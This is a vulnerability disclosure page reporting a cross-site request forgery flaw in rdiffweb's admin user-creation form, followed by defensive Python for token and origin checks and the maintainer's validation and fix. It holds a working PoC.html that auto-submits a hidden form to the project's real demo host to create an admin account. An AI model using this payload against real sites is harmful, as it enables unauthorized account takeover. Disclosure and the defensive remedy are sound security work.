Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb

Valid

Reported on

Sep 11th 2021


✍️ Description

Hello dear Rdiffweb team.

I found a CSRF vulnerability on the following endpoint that allows attackers to create users with PoC.html.

🕵️‍♂️ Proof of Concept

  1. A user with the right privileges should be logged in, in Firefox or Safari.

  2. The user goes to a website that contains PoC.html.

  3. After visiting the attacker's website, an admin user with username aaaa will be created.

PoC.html:

<html>
  <body>
    <!-- Hide the attacker page's real URL from the address bar -->
    <script>history.pushState('', '', '/')</script>
    <!-- Same fields the legitimate admin "add user" form submits; no anti-CSRF token is required -->
    <form action="https://rdiffweb-demo.ikus-soft.com/admin/users" method="POST">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="username" value="aaaa" />
      <input type="hidden" name="email" value="ad&#64;mm&#46;com" />
      <input type="hidden" name="password" value="admin123" />
      <input type="hidden" name="user&#95;root" value="aaaa" />
      <input type="hidden" name="role" value="0" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- Auto-submit on page load; the victim's session cookie is attached by the browser -->
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Also, an attacker can send multiple requests with the help of iframes.

Fix

I just want to suggest that you set a CSRF token for this form.
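The synchronizer-token pattern the report recommends, as an added example written for this page; it is not the researcher's code and not rdiffweb's actual fix (commit 0eba3b). It assumes a hypothetical per-session dict as the session store and a constructed site origin, and it shows why the PoC above fails once the check is in place: a form posted from a foreign page cannot read the token that only the legitimate form carries, and the Origin header a browser attaches to cross-site POSTs does not match the site's own.

```python
import hmac
import secrets
from typing import Dict, Mapping, Tuple

# Name of the hidden form field carrying the anti-CSRF token (constructed for this example).
TOKEN_KEY = "_csrf_token"


def issue_token(session: Dict[str, str]) -> str:
    """Return the session's CSRF token, minting one on first use.

    The token lives in the server-side session and is echoed back by every
    state-changing form; a page on another origin has no way to read it.
    """
    token = session.get(TOKEN_KEY)
    if token is None:
        token = secrets.token_urlsafe(32)
        session[TOKEN_KEY] = token
    return token


def render_form_field(session: Dict[str, str]) -> str:
    """Hidden input a server-rendered template would place inside the admin form."""
    return f'<input type="hidden" name="{TOKEN_KEY}" value="{issue_token(session)}" />'


def is_same_origin(headers: Mapping[str, str], expected_origin: str) -> bool:
    """Defence in depth: accept only requests whose Origin (or, failing that, Referer)
    is our own. Browsers send Origin on cross-site form POSTs, so a foreign or
    absent value marks the request as not coming from our pages."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == expected_origin
    referer = headers.get("Referer", "")
    return referer == expected_origin or referer.startswith(expected_origin + "/")


def check_csrf(session: Dict[str, str], method: str, form: Mapping[str, str],
               headers: Mapping[str, str], expected_origin: str) -> Tuple[bool, str]:
    """Decide whether a request may change state. Returns (allowed, reason)."""
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    expected = session.get(TOKEN_KEY)
    submitted = form.get(TOKEN_KEY)
    if not expected or not submitted:
        return False, "missing CSRF token"
    # Constant-time comparison so the token cannot be guessed byte by byte via timing.
    if not hmac.compare_digest(expected, submitted):
        return False, "CSRF token mismatch"
    if not is_same_origin(headers, expected_origin):
        return False, "cross-origin request"
    return True, "ok"


def demo() -> Dict[str, Tuple[bool, str]]:
    """Run the check against a legitimate submission and against forged ones (all constructed)."""
    origin = "https://backup.example"          # constructed site origin
    session = {"user": "admin"}                # constructed: an authenticated admin session
    # Legitimate: the browser posted our own rendered form, so the token is present.
    legit_form = {"action": "add", "username": "bob", TOKEN_KEY: issue_token(session)}
    legit_headers = {"Origin": origin}
    # Forged: the PoC's fields, posted from another site; it cannot know the token.
    forged_form = {"action": "add", "username": "aaaa", "role": "0"}
    forged_headers = {"Origin": "https://attacker.example"}
    return {
        "legit": check_csrf(session, "POST", legit_form, legit_headers, origin),
        "forged": check_csrf(session, "POST", forged_form, forged_headers, origin),
        "wrong_token": check_csrf(session, "POST", {**legit_form, TOKEN_KEY: "x" * 43},
                                  legit_headers, origin),
        "foreign_origin": check_csrf(session, "POST", legit_form, forged_headers, origin),
        "read_only": check_csrf(session, "GET", {}, forged_headers, origin),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:15s} -> {result}")
```

The token check alone defeats the PoC; the Origin check is kept as a second layer so that a token leaked elsewhere still cannot be replayed from a foreign page. A real deployment would also mark the session cookie `SameSite=Lax` or `Strict`, which stops the browser from attaching it to the cross-site POST in the first place.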

Z-Old
a year ago

Admin


Hey amammad, I've opened a PR on the repo asking for a security policy with email.

amammad
a year ago

Researcher


Hey @maintainer, can you validate this report too? Thanks.

Patrik Dufresne validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrik Dufresne marked this as fixed with commit 0eba3b a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
amammad
a year ago

Researcher


Thanks a lot @maintainer.

And sorry if there is some distribution today.
